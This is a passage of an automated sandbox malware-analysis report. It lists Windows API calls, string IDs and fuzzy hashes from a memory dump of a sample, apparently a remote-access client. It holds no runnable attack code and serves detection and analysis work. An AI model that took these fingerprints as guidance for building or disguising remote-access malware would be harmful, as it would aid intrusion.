                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                      • String ID: 0
                                                                                      • API String ID: 2755257978-4108050209
                                                                                      • Opcode ID: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                      • Instruction ID: ff6163613c0a8cbc830ef1528835912891ededd95cc8b4eaa22ca2fcf9c2cdf5
                                                                                      • Opcode Fuzzy Hash: ed19a4d0eac54c607b6a919a5e70af2297959f222d84ccf27589c69c777b0ba6
                                                                                      • Instruction Fuzzy Hash: 71318E70D11219ABEB01DFA4D885BEEBBFCEF46758F008059F951E6240E7759944CB60
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 1101D1E0
                                                                                      • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D1FA
                                                                                      • _memset.LIBCMT ref: 1101D20A
                                                                                      • RegisterClassExA.USER32(?), ref: 1101D24B
                                                                                      • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11194244,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D27E
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 1101D28B
                                                                                      • DestroyWindow.USER32(00000000), ref: 1101D292
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$Class_memset$CreateDestroyInfoRectRegister
                                                                                      • String ID: NSMChatSizeWnd
                                                                                      • API String ID: 2883038198-4119039562
                                                                                      • Opcode ID: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                      • Instruction ID: df00defde950c6a972f57fa33671139d82de9fa74eae4c6bde258e6239c9b3d1
                                                                                      • Opcode Fuzzy Hash: 87aebd6e18ee9abdefb850bcd11d4769ee8e47b38e4dbf48374c28c167509a6c
                                                                                      • Instruction Fuzzy Hash: C7314DB5D0021DAFDB10DFA5DD84BEEF7B8EB44628F20012EE925B7240D735A905CB64
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 1103D18F
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000125), ref: 1103D1BD
                                                                                      • CloseHandle.KERNEL32(?), ref: 1103D25C
                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1103D26C
                                                                                      • CloseHandle.KERNEL32(?), ref: 1103D279
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$FileModuleNameObjectSingleWait_memset
                                                                                      • String ID: /247$" /a$RunAnnot
                                                                                      • API String ID: 2581068044-4059077130
                                                                                      • Opcode ID: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                      • Instruction ID: dc76f3c11fb5ad4c0452055a60ef983052eda761819ccc7684b04031b26646f7
                                                                                      • Opcode Fuzzy Hash: b839e70076fc368ba000d97afe45d019281ed31407febcd3e3d047b5c4491ca4
                                                                                      • Instruction Fuzzy Hash: 4541C030A04319AFEB11DFA4CC84FDDB7B9EB48704F1080A5E6589B284DB71E944CF90
                                                                                      APIs
                                                                                      • GetProcAddress.KERNEL32(00000000,11195920), ref: 1100D3A4
                                                                                      • GetProcAddress.KERNEL32(00000000,11195910), ref: 1100D3B8
                                                                                      • GetProcAddress.KERNEL32(00000000,11195900), ref: 1100D3CD
                                                                                      • GetProcAddress.KERNEL32(00000000,111958F0), ref: 1100D3E1
                                                                                      • GetProcAddress.KERNEL32(00000000,111958E4), ref: 1100D3F5
                                                                                      • GetProcAddress.KERNEL32(00000000,111958C4), ref: 1100D40A
                                                                                      • GetProcAddress.KERNEL32(00000000,111958A4), ref: 1100D41E
                                                                                      • GetProcAddress.KERNEL32(00000000,11195894), ref: 1100D432
                                                                                      • GetProcAddress.KERNEL32(00000000,11195884), ref: 1100D447
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc
                                                                                      • String ID:
                                                                                      • API String ID: 190572456-0
                                                                                      • Opcode ID: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                      • Instruction ID: 496fda0e4c6754f74ae7accc981fa1b683a1531f66a76574b420f2493807621a
                                                                                      • Opcode Fuzzy Hash: 091c258913195d468f5e27a1e6f31e310fab824e6ee381838cf7674ab6c2accf
                                                                                      • Instruction Fuzzy Hash: BC318A719222349FE756CBE5CCD5B7AFFE9A748B19B00417AD42083248E7B46840CF90
                                                                                      APIs
                                                                                      • GetStockObject.GDI32(00000007), ref: 11113167
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 11113176
                                                                                      • SetBrushOrgEx.GDI32(?,00000000,00000000,00000000,?,11119DB4,?,00000001,00000001,00000000,1111E6D7,00000000,?,00000000), ref: 11113181
                                                                                      • GetStockObject.GDI32(00000000), ref: 11113189
                                                                                      • SelectObject.GDI32(?,00000000), ref: 11113192
                                                                                      • GetStockObject.GDI32(0000000D), ref: 11113196
                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 1111319F
                                                                                      • SelectClipRgn.GDI32(00000000,00000000), ref: 111131B3
                                                                                      • SelectClipRgn.GDI32(?,?), ref: 111131D5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Object$Select$Stock$Clip$Brush
                                                                                      • String ID:
                                                                                      • API String ID: 2690518013-0
                                                                                      • Opcode ID: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                      • Instruction ID: 6254f714a47a8412abfa64db40702d153c74c152478294c48941108971bda100
                                                                                      • Opcode Fuzzy Hash: 03940d1c13920ebdd2799aeba9173fb3b73a5c49d6e66c97bce195a3b1bf9d70
                                                                                      • Instruction Fuzzy Hash: CC114C71604214AFE320EFA9CC88F56F7E8AF48714F114529E698DB294C774E840CF60
                                                                                      APIs
                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11027053
                                                                                      • TranslateMessage.USER32(?), ref: 11027081
                                                                                      • DispatchMessageA.USER32(?), ref: 1102708B
                                                                                      • Sleep.KERNEL32(000003E8), ref: 11027114
                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102717A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$DispatchSleepTranslate
                                                                                      • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                                      • API String ID: 3237117195-3850961587
                                                                                      • Opcode ID: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                      • Instruction ID: 926780c6f4d8c8949c1ee256bdfa0d08ed5449f0693c43c0c5ab50156846c558
                                                                                      • Opcode Fuzzy Hash: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                      • Instruction Fuzzy Hash: AB41B475D01626DBEB15CBEDCC84EBEBBB9AB54708F900169E92593244E735E500CBA0
                                                                                      APIs
                                                                                      • GetWindowPlacement.USER32(00000000,0000002C,110BFEBC,?,Norm,110BFEBC), ref: 110B90E4
                                                                                      • MoveWindow.USER32(00000000,110BFEBC,110BFEBC,110BFEBC,110BFEBC,00000001,?,Norm,110BFEBC), ref: 110B9156
                                                                                      • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B91B1
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                      • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                      • API String ID: 1092798621-1973987134
                                                                                      • Opcode ID: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                      • Instruction ID: fa08d4082dbdb83dc84805081e5a13701295f49ac71a08f55a689e0031bf859b
                                                                                      • Opcode Fuzzy Hash: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                      • Instruction Fuzzy Hash: 6A411DB5B0020AAFDB08DFA4C895EAEF7B5FF88304F104669E519A7644DB30B945CB90
                                                                                      APIs
                                                                                        • Part of subcall function 1112A9E0: LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112AA16
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112AA33
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112AA3D
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,socket), ref: 1112AA4B
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112AA59
                                                                                        • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112AA67
                                                                                        • Part of subcall function 1112A9E0: FreeLibrary.KERNEL32(00000000), ref: 1112AADC
                                                                                      • LoadLibraryA.KERNEL32(ws2_32.dll,?,?,00000000), ref: 1112B38A
                                                                                      • GetProcAddress.KERNEL32(00000000,ntohl), ref: 1112B3A2
                                                                                      • _calloc.LIBCMT ref: 1112B3AD
                                                                                      • _free.LIBCMT ref: 1112B44B
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 1112B462
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$Library$FreeLoad$_calloc_free
                                                                                      • String ID: ntohl$ws2_32.dll
                                                                                      • API String ID: 2881363997-4165132517
                                                                                      • Opcode ID: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                      • Instruction ID: 62f3d354d7df00a53f20e52f5f0b7ab5f0e2fb1a0c0f97b8c5a029639f714dd3
                                                                                      • Opcode Fuzzy Hash: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                      • Instruction Fuzzy Hash: 67318D75E00229CBD7509F64CD80A9AF7B8FF48715F6081A6DC99A7200DF30AA858FD4
                                                                                      APIs
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 1115F12E
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • SystemParametersInfoA.USER32(00002000,00000000,00000001,00000000), ref: 1115F14F
                                                                                      • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F15C
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 1115F162
                                                                                      • SystemParametersInfoA.USER32(00002001,00000000,00000001,00000000), ref: 1115F177
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InfoParametersSystem$ForegroundWindow$ErrorExitLastMessageProcesswsprintf
                                                                                      • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                      • API String ID: 3960414890-2201682149
                                                                                      • Opcode ID: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                      • Instruction ID: 490c9e9faa58dc1df28f1acf4c3aa341e93c1bd023cf24429d0d7fa3412acb83
                                                                                      • Opcode Fuzzy Hash: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                      • Instruction Fuzzy Hash: 8F01F276790318BBE30096A9CC86F55F398EB54B14F104126F718AA1C0DAF1B851C7E1
APIs
• LoadMenuA.USER32(00000000,00002EFF), ref: 1100338E
• GetSubMenu.USER32(00000000,00000000), ref: 110033BA
• GetSubMenu.USER32(00000000,00000000), ref: 110033DC
• DestroyMenu.USER32(00000000), ref: 110033EA
  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
Strings
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
• String ID: ..\CTL32\annotate.cpp$hMenu$hSub
• API String ID: 468487828-934300333
• Opcode ID: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
• Instruction ID: f68e039685e14a294959d37ff9e7a7cb7630811a32528fcef7aaec2fda1b7dd6
• Opcode Fuzzy Hash: 8af01ad4efa7446add9b372c4420e91d6a3bebcd66f8e1993f70f2b692afa4a5
• Instruction Fuzzy Hash: 2FF0E93AF8466933E312A1F53C85F5BE74C9B515ECF450031F528EAA80EE54A80041AA
APIs
• GetClientRect.USER32(?,00000000), ref: 11119200
• ClientToScreen.USER32(?,?), ref: 11119241
• GetCursorPos.USER32(?), ref: 111192A1
• GetTickCount.KERNEL32 ref: 111192B6
• GetTickCount.KERNEL32 ref: 11119337
• WindowFromPoint.USER32(?,?,?,?), ref: 1111939A
• WindowFromPoint.USER32(000000FF,?), ref: 111193AE
• SetCursorPos.USER32(000000FF,?,?,?), ref: 111193C2
Memory Dump Source
• Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: ClientCountCursorFromPointTickWindow$RectScreen
• String ID:
• API String ID: 4245181967-0
